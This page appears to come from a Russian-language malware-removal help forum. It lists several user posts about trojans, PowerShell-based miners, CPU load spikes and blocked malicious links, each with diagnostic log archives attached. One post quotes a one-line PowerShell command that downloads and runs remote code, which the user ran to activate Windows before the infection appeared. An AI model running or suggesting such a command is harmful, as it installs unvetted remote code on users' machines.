Троян и PowerShell майнер
-
Похожий контент
-
Автор xxxholic
Здравствуйте! После проверки rougekiller нашлось 2 вируса, которые он не смог удалить C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64 2 и С:\Windows\Fonts\Mysql. Вначале использовал AV block remove. После перезагрузки собрал логи AutoLogger. Файлы прикрепляю
AV_block_remove_2023.10.05-17.21.log CollectionLog-2023.10.05-18.06.zip
-
Автор user344
Здравствуйте! Недавно компьютер в простое начинает переодически нагружаться до 100%, вентиляторы начинают крутить на полную в течении 5-10 минут, только начинаешь водить мышкой по рабочему столу, то сразу же нагрузка падает до дефолтных значений. Проверял лечащай утилитой др.веб и kvrt они вирусов не нашли.
CollectionLog-2025.06.25-21.11.zip
-
Автор ryckovry
Здравствуйте!
Вчера заразила ноут троянами. Просканировала его утилитой Касперского, было найдено 13 вирусов, нажала «Лечить с перезагрузкой». Сканирование после лечения нашло ещё 3 трояна, которых до этого не было в отчёте, и 2 других опасных файла (на фото). Но ноут хотя бы перестал греться и шуметь как сумасшедший, и проц не разгоняется больше до 100.
Сегодня просканировала второй раз, Касперский ничего не нашёл. Но я сомневаюсь, что все трояны удалены и обезврежены. Хочу убедиться в этом, но сама не понимаю, как. Скажите, пожалуйста, что нужно сделать?
Точку восстановления ОС пока не создавала.
CollectionLog-2024.03.22-12.58.zip
-
Автор VanyeJ
Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.
Событие: Остановлен переход на сайт
Пользователь: WIN-O4R3Q0UCBR5\User
Тип пользователя: Инициатор
Имя приложения: powershell.exe
Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Интернет-защита
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название:
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: 1731762779-9803.jpeg
Путь к объекту:
Причина: Облачная защита
Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
CollectionLog-2025.02.08-15.48.zip
-
Автор Alexoon
Подхватил какой-то вирус с почты. Постоянно открывается powershell и браузеры, т.е. по 5 раз в секунду
Антивирусы ни один его не видят
CollectionLog-2025.08.22-16.02.zip
-
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти